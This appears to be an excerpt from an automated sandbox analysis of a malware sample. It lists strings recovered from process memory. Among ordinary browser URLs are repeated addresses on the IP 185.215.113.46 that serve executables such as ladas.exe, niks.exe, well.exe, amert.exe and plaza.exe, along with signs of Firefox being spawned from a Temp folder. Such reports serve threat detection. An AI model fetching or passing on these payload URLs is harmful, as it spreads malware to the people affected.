                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com--attempting-deelevation equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.2399452687.0000029036200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/videoC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.comC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\DefaultA equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000023.00000002.2436802785.000001F3C9440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000003.2396912968.0000029037DA3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2400698861.0000029037DA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: I%!67n7https://www.facebook.com/video --attempting-deelevationUser equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2559374080.000001545535B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3235834027.0000015455286000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3083534171.00000154550FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/video equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C267000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3308363713.00000154624E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3235834027.0000015455286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2946754613.0000290E28A03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/Z equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000020.00000002.2399452687.0000029036209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.facebook.com/video --attempting-deelevation equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000001F.00000002.2388590768.00000159B5209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.youtube.com --attempting-deelevation equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C2A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe
                          Source: RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe)
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exe22
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/fu.exeagertaT
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe0
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe1
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe12
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe2
                          Source: I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe6
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe93
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeF
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exe_B
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeb
                          Source: I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeg
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeheidiMl1n683teX9h
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exelF
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exenBuil
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeo4H
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001485000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.3266538532.0000000001485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exeppData
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.000000000141E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exer
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exetch
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.0000000001446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/ladas.exex
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeF
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeIw$
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeJ
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exeMB
                          Source: MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/niks.exex
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exe2
                          Source: I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeBuil
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exePB
                          Source: MPGPH131.exe, 00000007.00000002.3265617716.000000000641C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeaw
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exeom0
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exet
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/cost/well.exex)
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CCC000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.00000000010D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe$
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe4
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe=;5
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exe?
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeINTEGERN
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2713747827.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2211769258.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2258451496.0000000000F5F000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2259213906.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeS
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exebB
                          Source: I2jCDr35mu.exe, 00000000.00000003.2395591209.0000000005CD1000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/amert.exeg
                          Source: MPGPH131.exe, 00000006.00000002.3401083597.00000000062BE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3345445002.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2653472132.0000000001124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exe
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exe0
                          Source: MPGPH131.exe, 00000007.00000002.3220691052.0000000001491000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeM
                          Source: MPGPH131.exe, 00000006.00000002.3402572267.0000000006396000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exee
                          Source: I2jCDr35mu.exe, 00000000.00000003.2601693895.0000000005CD5000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2602177921.0000000005D07000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2630425787.0000000005D00000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000002.2809320128.0000000005CD8000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2628190819.0000000005CD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exegVA
                          Source: I2jCDr35mu.exe, 00000000.00000003.2616503598.0000000000FBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeheidi9NcUyPNf3YG5
                          Source: RageMP131.exe, 00000008.00000002.2348896426.0000000000F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.46/mine/plaza.exeiB
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: firefox.exe, 00000024.00000003.3058703225.000001545C298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://accounts.google.com/
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000024.00000003.2682813977.00000154620E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 00000024.00000003.2553512433.0000015462538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-04/schema#
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-06/schema#
                          Source: firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://json-schema.org/draft-07/schema#-
                          Source: firefox.exe, 00000024.00000003.2708670257.000001545C497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2549223064.00000154625FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2577653183.000001545C496000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2671136731.00000154625FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/0c
                          Source: firefox.exe, 00000024.00000003.3065217085.0000015453A7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2469545196.0000015453AA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2829883257.00000154624C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3043257931.0000015454ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3343901655.0000015453A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2681200219.000001545C450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2462909736.0000015453D96000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3061707200.000001545E3D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3065069570.0000015453AA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3327988001.0000015453D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2972373655.0000015453DB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2632691040.000001545C18A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3238352322.000001546319A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2502897099.000001545E3D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2703972523.000001545DBC4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2468329463.00000154535C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2568116959.000001545E3D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3224963305.0000015463497000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3333878095.000001545C44F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3070437706.0000015453AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: firefox.exe, 00000024.00000003.2949175906.000012AB64003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/Z
                          Source: firefox.exe, 00000024.00000003.2553660970.0000015462271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/2006/browser/search/
                          Source: firefox.exe, 00000024.00000003.2557113466.000001545593C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: I2jCDr35mu.exe, 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, I2jCDr35mu.exe, 00000000.00000003.2093800693.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000002.3322219545.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000006.00000003.2145688572.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.3200225200.00000000009F1000.00000040.00000001.01000000.00000005.sdmp, MPGPH131.exe, 00000007.00000003.2145890043.0000000005190000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 00000008.00000002.2346163083.0000000000351000.00000040.00000001.01000000.00000006.sdmp, RageMP131.exe, 00000008.00000003.2256368231.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000003.2356250685.0000000004F90000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.2622415113.0000000000351000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                          Source: firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: firefox.exe, 00000024.00000003.2553660970.00000154622DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2677483972.00000154622DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000024.00000003.2682620775.00000154620EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 00000024.00000003.2453893132.0000015453A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: I2jCDr35mu.exe, 00000000.00000003.2210951115.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2216828658.0000000005CCE000.00000004.00000020.00020000.00000000.sdmp, I2jCDr35mu.exe, 00000000.00000003.2213460519.0000000005CAD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2284201731.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2278032895.00000000062D3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000006.00000003.2289127154.00000000062CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2214280425.0000000006328000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2224049430.0000000006338000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000003.2217504481.0000000006338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 00000024.00000003.2679918392.000001546225E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3149769273.000001546379D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                          Source: firefox.exe, 00000024.00000003.2697186537.0000015462031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                          Source: firefox.exe, 00000021.00000002.2399450082.000001C4DB630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.comC:
                          Source: firefox.exe, 00000024.00000003.3222585052.000001546347D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
                          Source: firefox.exe, 00000024.00000003.3105381143.00000154627D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.3223466540.000001546313E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
